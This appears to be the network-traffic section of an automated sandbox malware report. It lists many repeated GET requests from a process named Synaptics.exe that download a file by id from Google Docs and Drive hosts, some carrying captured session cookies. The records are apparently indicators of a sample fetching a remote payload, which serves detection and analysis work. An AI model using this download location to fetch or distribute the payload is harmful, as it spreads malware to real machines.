                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=Fz-E11ZM6YjFGwBY8KCQ28eAwJauLQ9gLsUY7Y8z17km7g59imrP-l0rDAC1qgPXd_P4wphfP965G181-1iCoFlL0Tm12sJVd_xR6e52Py990_PjzF_LhukeQxYW1NdrSNRWqyGaCaYUxuGMH98UYJUWHJxAt1mkp0pu4rT7GriDqhHc6Z0SyPyT
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=bWWimPFpGrpeChM6yW8CpvGPVv6yrbjRK0eN3_LjMzHTwb80_Q0DT0ian8zknRj9_GGPgwV59uu1e1qe5l1ZkmlCQ-aCgVEJ0EBW63qe4DmDCp9uNMwOMqRO4VTJens2XngEbFgR48_Qbw5g-4m3o-cHbDL-yQONhrctr5HWqIc12mjtQJ4TKxg
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=bWWimPFpGrpeChM6yW8CpvGPVv6yrbjRK0eN3_LjMzHTwb80_Q0DT0ian8zknRj9_GGPgwV59uu1e1qe5l1ZkmlCQ-aCgVEJ0EBW63qe4DmDCp9uNMwOMqRO4VTJens2XngEbFgR48_Qbw5g-4m3o-cHbDL-yQONhrctr5HWqIc12mjtQJ4TKxg
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=bWWimPFpGrpeChM6yW8CpvGPVv6yrbjRK0eN3_LjMzHTwb80_Q0DT0ian8zknRj9_GGPgwV59uu1e1qe5l1ZkmlCQ-aCgVEJ0EBW63qe4DmDCp9uNMwOMqRO4VTJens2XngEbFgR48_Qbw5g-4m3o-cHbDL-yQONhrctr5HWqIc12mjtQJ4TKxg
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=bWWimPFpGrpeChM6yW8CpvGPVv6yrbjRK0eN3_LjMzHTwb80_Q0DT0ian8zknRj9_GGPgwV59uu1e1qe5l1ZkmlCQ-aCgVEJ0EBW63qe4DmDCp9uNMwOMqRO4VTJens2XngEbFgR48_Qbw5g-4m3o-cHbDL-yQONhrctr5HWqIc12mjtQJ4TKxg
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Fz-E11ZM6YjFGwBY8KCQ28eAwJauLQ9gLsUY7Y8z17km7g59imrP-l0rDAC1qgPXd_P4wphfP965G181-1iCoFlL0Tm12sJVd_xR6e52Py990_PjzF_LhukeQxYW1NdrSNRWqyGaCaYUxuGMH98UYJUWHJxAt1mkp0pu4rT7GriDqhHc6Z0SyPyT
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Fz-E11ZM6YjFGwBY8KCQ28eAwJauLQ9gLsUY7Y8z17km7g59imrP-l0rDAC1qgPXd_P4wphfP965G181-1iCoFlL0Tm12sJVd_xR6e52Py990_PjzF_LhukeQxYW1NdrSNRWqyGaCaYUxuGMH98UYJUWHJxAt1mkp0pu4rT7GriDqhHc6Z0SyPyT
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Fz-E11ZM6YjFGwBY8KCQ28eAwJauLQ9gLsUY7Y8z17km7g59imrP-l0rDAC1qgPXd_P4wphfP965G181-1iCoFlL0Tm12sJVd_xR6e52Py990_PjzF_LhukeQxYW1NdrSNRWqyGaCaYUxuGMH98UYJUWHJxAt1mkp0pu4rT7GriDqhHc6Z0SyPyT
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Fz-E11ZM6YjFGwBY8KCQ28eAwJauLQ9gLsUY7Y8z17km7g59imrP-l0rDAC1qgPXd_P4wphfP965G181-1iCoFlL0Tm12sJVd_xR6e52Py990_PjzF_LhukeQxYW1NdrSNRWqyGaCaYUxuGMH98UYJUWHJxAt1mkp0pu4rT7GriDqhHc6Z0SyPyT
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Fz-E11ZM6YjFGwBY8KCQ28eAwJauLQ9gLsUY7Y8z17km7g59imrP-l0rDAC1qgPXd_P4wphfP965G181-1iCoFlL0Tm12sJVd_xR6e52Py990_PjzF_LhukeQxYW1NdrSNRWqyGaCaYUxuGMH98UYJUWHJxAt1mkp0pu4rT7GriDqhHc6Z0SyPyT
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Fz-E11ZM6YjFGwBY8KCQ28eAwJauLQ9gLsUY7Y8z17km7g59imrP-l0rDAC1qgPXd_P4wphfP965G181-1iCoFlL0Tm12sJVd_xR6e52Py990_PjzF_LhukeQxYW1NdrSNRWqyGaCaYUxuGMH98UYJUWHJxAt1mkp0pu4rT7GriDqhHc6Z0SyPyT
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Fz-E11ZM6YjFGwBY8KCQ28eAwJauLQ9gLsUY7Y8z17km7g59imrP-l0rDAC1qgPXd_P4wphfP965G181-1iCoFlL0Tm12sJVd_xR6e52Py990_PjzF_LhukeQxYW1NdrSNRWqyGaCaYUxuGMH98UYJUWHJxAt1mkp0pu4rT7GriDqhHc6Z0SyPyT
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Fz-E11ZM6YjFGwBY8KCQ28eAwJauLQ9gLsUY7Y8z17km7g59imrP-l0rDAC1qgPXd_P4wphfP965G181-1iCoFlL0Tm12sJVd_xR6e52Py990_PjzF_LhukeQxYW1NdrSNRWqyGaCaYUxuGMH98UYJUWHJxAt1mkp0pu4rT7GriDqhHc6Z0SyPyT
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Fz-E11ZM6YjFGwBY8KCQ28eAwJauLQ9gLsUY7Y8z17km7g59imrP-l0rDAC1qgPXd_P4wphfP965G181-1iCoFlL0Tm12sJVd_xR6e52Py990_PjzF_LhukeQxYW1NdrSNRWqyGaCaYUxuGMH98UYJUWHJxAt1mkp0pu4rT7GriDqhHc6Z0SyPyT
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Fz-E11ZM6YjFGwBY8KCQ28eAwJauLQ9gLsUY7Y8z17km7g59imrP-l0rDAC1qgPXd_P4wphfP965G181-1iCoFlL0Tm12sJVd_xR6e52Py990_PjzF_LhukeQxYW1NdrSNRWqyGaCaYUxuGMH98UYJUWHJxAt1mkp0pu4rT7GriDqhHc6Z0SyPyT
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Fz-E11ZM6YjFGwBY8KCQ28eAwJauLQ9gLsUY7Y8z17km7g59imrP-l0rDAC1qgPXd_P4wphfP965G181-1iCoFlL0Tm12sJVd_xR6e52Py990_PjzF_LhukeQxYW1NdrSNRWqyGaCaYUxuGMH98UYJUWHJxAt1mkp0pu4rT7GriDqhHc6Z0SyPyT
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
